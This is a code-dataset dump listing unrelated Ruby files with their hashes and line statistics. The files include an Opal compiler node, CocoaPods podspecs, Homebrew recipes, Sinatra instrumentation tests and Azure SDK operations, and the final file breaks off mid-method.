hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
edce47c8cd4ebb48483d9abbe5acdeaf5738fa79 | 248 | FactoryBot.define do
factory :sync_token do
association :source_cell_volume, factory: :cell_volume
association :target_cell_volume, factory: :cell_volume
association :object, factory: :full_object
status :scheduled
end
end
| 27.555556 | 58 | 0.754032 |
f812492882427a6fce69787122c82f6e19bcaa7a | 2,857 | # frozen_string_literal: true
require 'pathname'
require 'opal/version'
require 'opal/nodes/scope'
module Opal
module Nodes
# Generates code for an entire file, i.e. the base sexp
class TopNode < ScopeNode
handle :top
children :body
def compile
push version_comment
opening
in_scope do
line '"use strict";' if compiler.use_strict?
body_code = stmt(stmts)
body_code = [body_code] unless body_code.is_a?(Array)
if compiler.eval?
add_temp '$nesting = self.$$is_a_module ? [self] : [self.$$class]'
else
add_temp 'self = Opal.top'
add_temp '$nesting = []'
end
add_temp 'nil = Opal.nil'
add_temp '$$$ = Opal.$$$'
add_temp '$$ = Opal.$$'
add_used_helpers
add_used_operators
line scope.to_vars
compile_method_stubs
compile_irb_vars
compile_end_construct
line body_code
end
closing
end
def opening
if compiler.requirable?
line "Opal.modules[#{Opal::Compiler.module_name(compiler.file).inspect}] = function(Opal) {"
elsif compiler.eval?
line '(function(Opal, self) {'
else
line '(function(Opal) {'
end
end
def closing
if compiler.requirable?
line "};\n"
elsif compiler.eval?
line '})(Opal, self)'
else
line "})(Opal);\n"
end
end
def stmts
compiler.returns(body)
end
def compile_irb_vars
if compiler.irb?
line 'if (!Opal.irb_vars) { Opal.irb_vars = {}; }'
end
end
def add_used_helpers
compiler.helpers.to_a.each { |h| add_temp "$#{h} = Opal.#{h}" }
end
def add_used_operators
operators = compiler.operator_helpers.to_a
operators.each do |op|
name = Nodes::CallNode::OPERATORS[op]
line "function $rb_#{name}(lhs, rhs) {"
line " return (typeof(lhs) === 'number' && typeof(rhs) === 'number') ? lhs #{op} rhs : lhs['$#{op}'](rhs);"
line '}'
end
end
def compile_method_stubs
if compiler.method_missing?
calls = compiler.method_calls
stubs = calls.to_a.map { |k| "'$#{k}'" }.join(', ')
line "Opal.add_stubs([#{stubs}]);" unless stubs.empty?
end
end
# Any special __END__ content in code
def compile_end_construct
if content = compiler.eof_content
line 'var $__END__ = Opal.Object.$new();'
line "$__END__.$read = function() { return #{content.inspect}; };"
end
end
def version_comment
"/* Generated by Opal #{Opal::VERSION} */"
end
end
end
end
| 24.843478 | 118 | 0.540777 |
61fd7bf1b18a0f043cae91829947d1f27752078b | 470 | # encoding: utf-8
# frozen_string_literal: true
module Services
module Products
# This is the Products index service
class Index < Services::ApplicationService
include Services::Concerns::ActsAsIndexable
def initialize(user_session, params)
@user_session = user_session
@params = params
end
def execute!
indexable(scope)
end
protected
def scope
Product
end
end
end
end
| 17.407407 | 49 | 0.640426 |
acd710f9f33e6ba0828e98131b9d08fe636b5780 | 1,660 | Pod::Spec.new do |s|
s.name = 'GRDB.swift'
s.version = '4.14.0'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.summary = 'A toolkit for SQLite databases, with a focus on application development.'
s.homepage = 'https://github.com/groue/GRDB.swift'
s.author = { 'Gwendal Roué' => '[email protected]' }
s.source = { :git => 'https://github.com/groue/GRDB.swift.git', :tag => "v#{s.version}" }
s.module_name = 'GRDB'
s.swift_versions = ['4.2', '5.0']
s.ios.deployment_target = '9.0'
s.osx.deployment_target = '10.9'
s.watchos.deployment_target = '2.0'
s.tvos.deployment_target = '9.0'
s.default_subspec = 'standard'
s.subspec 'standard' do |ss|
ss.source_files = 'GRDB/**/*.swift', 'Support/grdb_config.h'
ss.framework = 'Foundation'
ss.library = 'sqlite3'
end
s.subspec 'SQLCipher' do |ss|
ss.source_files = 'GRDB/**/*.swift', 'Support/grdb_config.h'
ss.framework = 'Foundation'
ss.dependency 'SQLCipher', '>= 3.4.0'
ss.xcconfig = {
'OTHER_SWIFT_FLAGS' => '$(inherited) -D SQLITE_HAS_CODEC -D GRDBCIPHER -D SQLITE_ENABLE_FTS5',
'OTHER_CFLAGS' => '$(inherited) -DSQLITE_HAS_CODEC -DGRDBCIPHER -DSQLITE_ENABLE_FTS5',
'GCC_PREPROCESSOR_DEFINITIONS' => '$(inherited) SQLITE_HAS_CODEC=1 GRDBCIPHER=1 SQLITE_ENABLE_FTS5=1'
}
end
# MARK: - iOS Static Framework
s.platform = :ios
s.ios.deployment_target = '9.0'
s.swift_version = '5.3'
s.license = {}
s.static_framework = true
s.subspecs.each do |sc|
cn = sc.consumer(:ios)
sc.ios.source_files = cn.source_files.map { |pt| "#{cn.version}/#{pt}" } if !cn.source_files.blank?
end
end
| 33.2 | 107 | 0.642169 |
184db35bdb6713db8ce300cbe1130728ddcf8864 | 373 | When /^I check hidden spam checkbox$/ do
id = find(".boolean.required[id*='confirmation_input'] input[name*='[confirmation]'][type=checkbox]")[:id]
page.evaluate_script <<-JS
document.getElementById("#{id}").checked = true
JS
end
When /^timestamp spam check will return probability (\d+)$/ do |value|
stub_spam_protection_timestamp_probability(value.to_f)
end
| 33.909091 | 108 | 0.729223 |
e91f233ee15b0ef5069f32e60cff7e0c92deb4a2 | 195 | class ContactNumber < ActiveRecord::Base
belongs_to :contact
validates :label, :number, presence: true, length: { maximum: 255 }
include TranslatableModel
translates :label, :number
end
| 24.375 | 69 | 0.753846 |
0197f7119da27a9d0d3728e8893e289c920170aa | 958 | Pod::Spec.new do |s|
s.version = "2.5.7"
s.source = { :http => "https://download.avoscloud.com/sdk/iOS/release-v#{s.version}/AVOSCloudSNS.framework.zip"}
s.platform = :ios, '5.0'
s.name = "AVOSCloudSNS"
s.summary = "AVOS Cloud SNS SDK for iOS"
s.homepage = "http://avoscloud.com"
s.license = { :type => 'Commercial', :text => '© Copyright 2013 AVOS Systems, Inc. See https://cn.avoscloud.com/terms.html' }
s.author = { "AVOS Cloud" => "[email protected]" }
s.documentation_url = 'https://cn.avoscloud.com/docs/api/iOS/index.html'
s.requires_arc = true
s.preserve_paths = "iOS/release-v#{s.version}/*"
s.vendored_frameworks = "iOS/release-v#{s.version}/AVOSCloudSNS.framework"
s.public_header_files = "iOS/release-v#{s.version}/**/*.h"
s.frameworks = 'CFNetwork', 'SystemConfiguration', 'MobileCoreServices', 'Security'
s.dependency 'AVOSCloud'
end
| 39.916667 | 134 | 0.631524 |
bb6d467cdc28d11ea99e2bd0f7533f8757d1a286 | 953 | # frozen_string_literal: true
require "rails/generators"
require "rails/generators/rails/model/model_generator"
module Dis
module Generators
class ModelGenerator < Rails::Generators::ModelGenerator
desc "Creates a Dis model"
def initialize(args, *options)
super(inject_dis_attributes(args), *options)
end
def add_model_extension
inject_into_file(
File.join("app/models", class_path, "#{file_name}.rb"),
after: "ActiveRecord::Base\n"
) do
" include Dis::Model\n"
end
end
private
def inject_dis_attributes(args)
if args.any?
[args[0]] + dis_attributes + args[1..args.length]
else
args
end
end
def dis_attributes
%w[
content_hash:string
content_type:string
content_length:integer
filename:string
]
end
end
end
end
| 21.177778 | 65 | 0.593914 |
08af9c2fd82a5dc63ea5f1b5eaf8a2137f032745 | 338 | cask 'hyper' do
version :latest
sha256 :no_check
# amazonaws.com is the official download host per the vendor homepage
url 'https://hyper-install.s3.amazonaws.com/hyper-mac.pkg'
name 'Hyper'
homepage 'https://hyper.sh/'
license :apache
pkg 'hyper-mac.pkg'
uninstall :script => '/opt/hyper/bin/uninstall-hyper.sh'
end
| 22.533333 | 71 | 0.713018 |
62de81250a0a372cf188afa60ab2935aee82ca5f | 351 | # frozen_string_literal: true
module ActionMailer
# Returns the version of the currently loaded Action Mailer as a <tt>Gem::Version</tt>.
def self.gem_version
Gem::Version.new VERSION::STRING
end
module VERSION
MAJOR = 5
MINOR = 2
TINY = 3
PRE = nil
STRING = [MAJOR, MINOR, TINY, PRE].compact.join(".")
end
end
| 19.5 | 89 | 0.660969 |
edb8802fb0f127e1c7f94b9eb9fc52e8bc9222c5 | 437 | #
# Cookbook:: openmrs
# Spec:: default
#
# Copyright:: 2017, The Authors, All Rights Reserved.
require 'spec_helper'
describe 'openmrs::default' do
context 'When all attributes are default, on an unspecified platform' do
let(:chef_run) do
runner = ChefSpec::ServerRunner.new
runner.converge(described_recipe)
end
it 'converges successfully' do
expect { chef_run }.to_not raise_error
end
end
end
| 20.809524 | 74 | 0.702517 |
ed22c71042c76bc9cf043056376de5c8bb278e5a | 1,188 | Rails.application.routes.draw do
root 'spaces#show'
# get "/auth/:provider/callback", "sessions#create"
# post "/auth/:provider/callback", "sessions#create"
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
resources :spaces, only: %I[show edit update] do
resource :authenticated_session, only: %i[new create destroy show]
resources :invitations, only: %i[create destroy] do
resource :rsvp, only: %i[show update]
end
resources :rooms, only: %i[show edit update new create destroy] do
resource :waiting_room, only: %i[show update]
resources :furniture_placements, only: %i[create update destroy]
namespace :furniture do
Furniture.append_routes(self)
end
end
resources :utility_hookups, only: %I[create edit update destroy index]
end
resource :me, only: %i[show], controller: 'me'
match '/workspaces/*path', to: redirect('/spaces/%{path}'), via: [:GET]
resources :guides, only: %i[index show]
constraints BrandedDomain.new(Space) do
resources :authenticated_sessions, only: %i[new create delete show]
get '/:id', to: 'rooms#show'
end
end
| 32.108108 | 102 | 0.693603 |
26987fdfc669d47409110853e51220123cd6cba3 | 219 | # frozen_string_literal: true
# json formatter for logs
class JSONLogFormatter < ::Logger::Formatter
def call(severity, time, _progname, msg)
JSON.dump(level: severity, time: time, message: msg) + "\n"
end
end
| 24.333333 | 63 | 0.721461 |
6a39b3d1726508658944ee11ddd0eb80c98f2f64 | 1,423 | #
# Author:: Daniel DeLeo (<[email protected]>)
# Copyright:: Copyright (c) 2008 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
require 'support/shared/unit/resource/static_provider_resolution'
describe Chef::Resource::Git do
static_provider_resolution(
resource: Chef::Resource::Git,
provider: Chef::Provider::Git,
name: :git,
action: :sync,
)
before(:each) do
@git = Chef::Resource::Git.new("my awesome webapp")
end
it "is a kind of Scm Resource" do
expect(@git).to be_a_kind_of(Chef::Resource::Scm)
expect(@git).to be_an_instance_of(Chef::Resource::Git)
end
it "uses aliases revision as branch" do
@git.branch "HEAD"
expect(@git.revision).to eql("HEAD")
end
it "aliases revision as reference" do
@git.reference "v1.0 tag"
expect(@git.revision).to eql("v1.0 tag")
end
end
| 27.901961 | 74 | 0.712579 |
b9af18fd1d61d2db344a6578926a9e58fd32138c | 2,322 | class Grade < ActiveRecord::Base
belongs_to :fireman
validates_date :date, :allow_blank => true, :on_or_before => :today
after_save :update_intervention_editable_at
GRADE_CATEGORY = {
'Médecin' => 5,
'Infirmier' => 4,
'Officier' => 1,
'Sous-officier' => 2,
'Homme du rang' => 3,
'JSP' => 6
}.freeze
GRADE_CATEGORY_PLURAL = {
'Médecins' => 5,
'Infirmiers' => 4,
'Officiers' => 1,
'Sous-officiers' => 2,
'Hommes du rang' => 3,
'JSP' => 6
}
GRADE = {
'Médecin colonel' => 22,
'Médecin lieutenant-colonel' => 21,
'Médecin commandant' => 20,
'Médecin capitaine' => 19,
"Infirmier d'encadrement" => 18,
'Infirmier chef' => 17,
'Infirmier principal' => 16,
'Infirmier' => 15,
'Colonel' => 14,
'Lieutenant-colonel' => 13,
'Commandant' => 12,
'Capitaine' => 11,
'Lieutenant' => 10,
'Major' => 9,
'Adjudant-chef' => 8,
'Adjudant' => 7,
'Sergent-chef' => 6,
'Sergent' => 5,
'Caporal-chef' => 4,
'Caporal' => 3,
'1ère classe' => 2,
'2e classe' => 1,
'JSP 4' => 0,
'JSP 3' => -1,
'JSP 2' => -2,
'JSP 1' => -3
}.freeze
GRADE_CATEGORY_MATCH = { 1 => 3, 2 => 3, 3 => 3, 4 => 3,
5 => 2, 6 => 2, 7 => 2, 8 => 2,
9 => 1, 10 => 1, 11 => 1, 12 => 1, 13 => 1, 14 => 1,
15 => 4, 16 => 4, 17 => 4, 18 => 4,
19 => 5, 20 => 5, 21 => 5, 22 => 5,
0 => 6, -1 => 6, -2 => 6, -3 => 6}
def self.new_defaults
GRADE.sort_by {|grade| 1-grade[1] }.inject([]) do |result, grade|
result << Grade.new(:kind => grade[1])
end
end
private
def update_intervention_editable_at
self.fireman.station.update_intervention_editable_at if self.date_changed?
end
end
| 30.552632 | 79 | 0.393196 |
33517e62298984771fe6a4460f365e96fbf5db02 | 133 | module NotificationService
class ApplicationController < ActionController::API
include SharedModules::Authentication
end
end
| 22.166667 | 53 | 0.827068 |
5d35d30c4f0bd7dce9188dd98bb095fa266307e9 | 177 | class Etl::Edition::Content::ReadingTime
def self.calculate(words)
# 200 words per minute. Rounds up to 1 anything less than 1 minute.
(words / 200.00).ceil
end
end
| 25.285714 | 71 | 0.706215 |
d59287a008d5555232553c6621a38a8181c29e85 | 1,763 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "aws_lambda_memory_amount/version"
Gem::Specification.new do |spec|
spec.name = "aws_lambda_memory_amount"
spec.version = AwsLambdaMemoryAmount::VERSION
spec.authors = ["haruharuharuby"]
spec.email = ["[email protected]"]
spec.summary = %q{Make list of all of AWS Lambda functions memory amount}
spec.description = %q{This gem makes a list of memory amount of all lambda functions and calculate average of memory amount in latest 10 CWL events}
spec.homepage = "https://github.com/hugtechio/aws_lambda_memory_amount_ruby.git"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
# if spec.respond_to?(:metadata)
# spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
# else
# raise "RubyGems 2.0 or newer is required to protect against " \
# "public gem pushes."
# end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 45.205128 | 152 | 0.686897 |
ff8a24b623b121aacd3c65c704a2c2cf1deed48b | 8,544 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DigitalTwins::Mgmt::V2020_10_31
#
# Azure Digital Twins Client for managing DigitalTwinsInstance
#
class Operations
include MsRestAzure
#
# Creates and initializes a new instance of the Operations class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [AzureDigitalTwinsManagementClient] reference to the AzureDigitalTwinsManagementClient
attr_reader :client
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<Operation>] operation results.
#
def list(custom_headers:nil)
first_page = list_as_lazy(custom_headers:custom_headers)
first_page.get_all_items
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(custom_headers:nil)
list_async(custom_headers:custom_headers).value!
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(custom_headers:nil)
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '10'" if [email protected]_version.nil? && @client.api_version.length < 10
@client.api_version = '2020-10-31'
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.DigitalTwins/operations'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DigitalTwins::Mgmt::V2020_10_31::Models::OperationListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [OperationListResult] operation results.
#
def list_next(next_page_link, custom_headers:nil)
response = list_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_next_with_http_info(next_page_link, custom_headers:nil)
list_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DigitalTwins::Mgmt::V2020_10_31::Models::OperationListResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all of the available DigitalTwins service REST API operations.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [OperationListResult] which provide lazy access to pages of the
# response.
#
def list_as_lazy(custom_headers:nil)
response = list_async(custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 38.660633 | 163 | 0.687149 |
39ce1c0148af951bd1991454661f91c183d10c26 | 6,188 | # encoding: utf-8
# This file is distributed under New Relic's license terms.
# See https://github.com/newrelic/rpm/blob/master/LICENSE for complete details.
class SinatraIgnoreTestApp < Sinatra::Base
get '/record' do request.path_info end
newrelic_ignore '/ignore'
get '/ignore' do request.path_info end
newrelic_ignore '/splat*'
get '/splattered' do request.path_info end
newrelic_ignore '/named/:id'
get '/named/:id' do request.path_info end
newrelic_ignore '/v1', '/v2'
get '/v1' do request.path_info end
get '/v2' do request.path_info end
get '/v3' do request.path_info end
newrelic_ignore(/\/.+regex.*/)
get '/skip_regex' do request.path_info end
get '/regex_seen' do request.path_info end
newrelic_ignore '/ignored_erroring'
get '/ignored_erroring' do raise 'boom'; end
newrelic_ignore_apdex '/no_apdex'
get '/no_apdex' do request.path_info end
newrelic_ignore_enduser '/no_enduser'
get '/enduser' do
"<html><head></head><body>#{request.path_info}</body></html>"
end
get '/no_enduser' do
"<html><head></head><body>#{request.path_info}</body></html>"
end
end
class SinatraTestCase < Minitest::Test
include Rack::Test::Methods
include ::NewRelic::Agent::Instrumentation::Sinatra
include MultiverseHelpers
JS_AGENT_LOADER = "JS_AGENT_LOADER"
setup_and_teardown_agent(:application_id => 'appId',
:beacon => 'beacon',
:browser_key => 'browserKey',
:js_agent_loader => JS_AGENT_LOADER)
def get_and_assert_ok(path)
get(path)
assert_equal 200, last_response.status
assert_match(/#{Regexp.escape(path)}/, last_response.body)
end
def assert_enduser_ignored(response)
refute_match(/#{JS_AGENT_LOADER}/, response.body)
end
def refute_enduser_ignored(response)
assert_match(/#{JS_AGENT_LOADER}/, response.body)
end
# Keep Test::Unit happy by specifying at least one test method here
# Real tests are defined in subclasses.
def test_nothing; end
end
class SinatraIgnoreTest < SinatraTestCase
def app
SinatraIgnoreTestApp
end
def app_name
app.to_s
end
def test_seen_route
get_and_assert_ok '/record'
segment = name_for_route 'record'
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignores_exact_match
get_and_assert_ok '/ignore'
segment = name_for_route 'ignore'
assert_metrics_not_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignores_by_splats
get_and_assert_ok '/splattered'
segment = name_for_route 'splattered'
assert_metrics_not_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignores_can_be_declared_in_batches
get_and_assert_ok '/v1'
get_and_assert_ok '/v2'
get_and_assert_ok '/v3'
v1_segment = name_for_route 'v1'
v2_segment = name_for_route 'v2'
v3_segment = name_for_route 'v3'
assert_metrics_not_recorded([
"Controller/Sinatra/#{app_name}/#{v1_segment}",
"Controller/Sinatra/#{app_name}/#{v2_segment}",
"Apdex/Sinatra/#{app_name}/#{v1_segment}",
"Apdex/Sinatra/#{app_name}/#{v2_segment}"])
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{v3_segment}",
"Apdex/Sinatra/#{app_name}/#{v3_segment}"])
end
def test_seen_with_regex
get_and_assert_ok '/regex_seen'
segment = name_for_route 'regex_seen'
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignores_by_regex
get_and_assert_ok '/skip_regex'
segment = name_for_route 'skip_regex'
assert_metrics_not_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignore_apdex
get_and_assert_ok '/no_apdex'
segment = name_for_route 'no_apdex'
assert_metrics_recorded(["Controller/Sinatra/#{app_name}/#{segment}"])
assert_metrics_not_recorded(["Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignore_enduser_should_only_apply_to_specified_route
get_and_assert_ok '/enduser'
segment = name_for_route 'enduser'
refute_enduser_ignored(last_response)
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignore_enduser
get_and_assert_ok '/no_enduser'
segment = name_for_route 'no_enduser'
assert_enduser_ignored(last_response)
assert_metrics_recorded([
"Controller/Sinatra/#{app_name}/#{segment}",
"Apdex/Sinatra/#{app_name}/#{segment}"])
end
def test_ignore_errors_in_ignored_transactions
get '/ignored_erroring'
assert_metrics_not_recorded(["Errors/all"])
end
def name_for_route path
if last_request.env.key? 'sinatra.route'
"GET /#{path}"
else
"GET #{path}"
end
end
end
# Blanket ignore for whole app if newrelic_ignore called without parameters
class SinatraIgnoreItAllApp < Sinatra::Base
newrelic_ignore
get '/' do request.path_info end
end
class SinatraIgnoreItAllTest < SinatraTestCase
def app
SinatraIgnoreItAllApp
end
def test_ignores_everything
# Avoid Supportability metrics from startup of agent for this check
NewRelic::Agent.drop_buffered_data
get_and_assert_ok '/'
assert_metrics_recorded_exclusive(['Supportability/API/drop_buffered_data'])
end
end
# Blanket ignore for whole app if calls made without parameters
class SinatraIgnoreApdexAndEndUserApp < Sinatra::Base
newrelic_ignore_apdex
newrelic_ignore_enduser
get '/' do request.path_info end
end
class SinatraIgnoreApdexAndEndUserTest < SinatraTestCase
def app
SinatraIgnoreApdexAndEndUserApp
end
def test_ignores_apdex
get_and_assert_ok '/'
assert_metrics_not_recorded(["Apdex/Sinatra/#{app.to_s}/GET /"])
end
def test_ignores_enduser
get_and_assert_ok '/'
assert_enduser_ignored(last_response)
end
end
| 27.259912 | 80 | 0.714447 |
1cc5ebb7892d5dc98d424dd149f21678cb8a211d | 150 | require 'opencl_ruby_ffi'
require 'narray_ffi'
OpenCL::platforms.each do |p|
puts p.name
p.devices.each { |d| puts " --Device: #{d.name}" }
end
| 18.75 | 53 | 0.673333 |
d563e690ab4ec9a7e9b3149926c70cba2c46b01e | 179 | class ShowAction < SweetActions::JSON::ShowAction
# def set_resource
# resource_class.find(params[:id])
# end
# def authorized?
# can?(:read, resource)
# end
end
| 17.9 | 49 | 0.664804 |
4aea4cbbac3f1f716b7a03d14f339ed98077bdeb | 1,015 | # frozen_string_literal: true
require File.expand_path('lib/rggen/markdown/version', __dir__)
Gem::Specification.new do |spec|
spec.name = 'rggen-markdown'
spec.version = RgGen::Markdown::VERSION
spec.authors = ['Taichi Ishitani']
spec.email = ['[email protected]']
spec.summary = "rggen-markdown-#{RgGen::Markdown::VERSION}"
spec.description = <<~'DESCRIPTION'
Markdown generator for RgGen.
DESCRIPTION
spec.homepage = 'https://github.com/rggen/rggen-markdown'
spec.license = 'MIT'
spec.metadata = {
'bug_tracker_uri' => 'https://github.com/rggen/rggen-markdown/issues',
'mailing_list_uri' => 'https://groups.google.com/d/forum/rggen',
'source_code_uri' => 'https://github.com/rggen/rggen-markdown',
'wiki_uri' => 'https://github.com/rggen/rggen/wiki'
}
spec.files =
`git ls-files lib LICENSE CODE_OF_CONDUCT.mkd README.md`.split($RS)
spec.require_paths = ['lib']
spec.required_ruby_version = '>= 2.5'
spec.add_development_dependency 'bundler'
end
| 30.757576 | 74 | 0.705419 |
1d0d4fa2b02d38ebb33764a2168697e6011364a2 | 1,550 | class Libxc < Formula
desc "Library of exchange and correlation functionals for codes"
homepage "http://octopus-code.org/wiki/Libxc"
url "http://www.tddft.org/programs/octopus/down.php?file=libxc/3.0.1/libxc-3.0.1.tar.gz"
sha256 "836692f2ab60ec3aca0cca105ed5d0baa7d182be07cc9d0daa7b80ee1362caf7"
revision 1
bottle do
cellar :any
sha256 "10edb1b0047a9d08e4d86ebb49b3ff6f257649192be8f430893a29534c26cff7" => :high_sierra
sha256 "fb24b4f5ce8c2c2a438b26cdd33264850911ccd91494e038fd320b3cab8e4688" => :sierra
sha256 "7c5c77cef496e0d919fe0a99ee63c3594985be5f35d908bb4a1144f0dbad19bc" => :el_capitan
end
depends_on "gcc" # for gfortran
def install
system "./configure", "--prefix=#{prefix}",
"--enable-shared",
"FCCPP=gfortran -E -x c",
"CC=#{ENV.cc}"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <stdio.h>
#include <xc.h>
int main()
{
int major, minor, micro;
xc_version(&major, &minor, µ);
printf(\"%d.%d.%d\", major, minor, micro);
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-lxc", "-I#{include}", "-o", "ctest"
system "./ctest"
(testpath/"test.f90").write <<~EOS
program lxctest
use xc_f90_types_m
use xc_f90_lib_m
end program lxctest
EOS
system "gfortran", "test.f90", "-L#{lib}", "-lxc", "-I#{include}",
"-o", "ftest"
system "./ftest"
end
end
| 31 | 93 | 0.610323 |
33a10a4a6dc5346f877707c95b22617fabb9c02e | 259 | class CreateProjects < ActiveRecord::Migration[5.2]
def change
create_table :projects do |t|
t.string :name
t.string :description
t.date :due_date
t.integer :status
t.integer :owner_id
t.timestamps
end
end
end
| 18.5 | 51 | 0.640927 |
e871ec7d77b6d208af4305497d4343466f396d13 | 4,435 | class VisitorsController < ApplicationController
def complete_registration
if current_user.bitpay_invoices.find_by_name("sign_up") == nil
